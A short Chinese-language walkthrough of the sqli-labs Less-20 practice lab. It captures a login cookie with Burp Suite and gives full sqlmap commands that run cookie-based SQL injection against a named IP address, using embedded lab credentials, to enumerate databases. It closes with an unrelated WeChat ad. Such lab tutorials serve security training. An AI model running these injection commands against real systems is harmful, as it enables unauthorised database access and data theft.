
1
1
登入目标位址,輸入使用者名和密碼,使用者名和密碼都是admin
點選Submit
開啟代理服務 選擇 HTTP代理:127.0.0.1,端口:8080
打開 burp
通過抓包,我們知道登入的cookie是uname=admin
2
進行sqlmap的cookie注入攻擊
windows 下指令為
C:\Python27\sqlmap>sqlmap.py -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2
Linux 下指令為
sqlmap -u http://47.111.130.141:9002/sqli-labs/Less-20/ --cookie="uname=admin" --auth-type="Basic" --auth-cred="user2:pentest2" --batch --dbs --level=2
說明: 參數: --level=LEVEL
預設情況下SQLMAP隻支援GET/POST參數的注入測試,但是當使用 --level參數且數值>=2的時候會進行cookie注入測試;當>=3時,會進行User-Agent和Referer的注入測試。
結果畫面為
接下來可以爆表爆資料了。
想領取【200份履歷模闆】請加小唐老師微信 回複暗号:200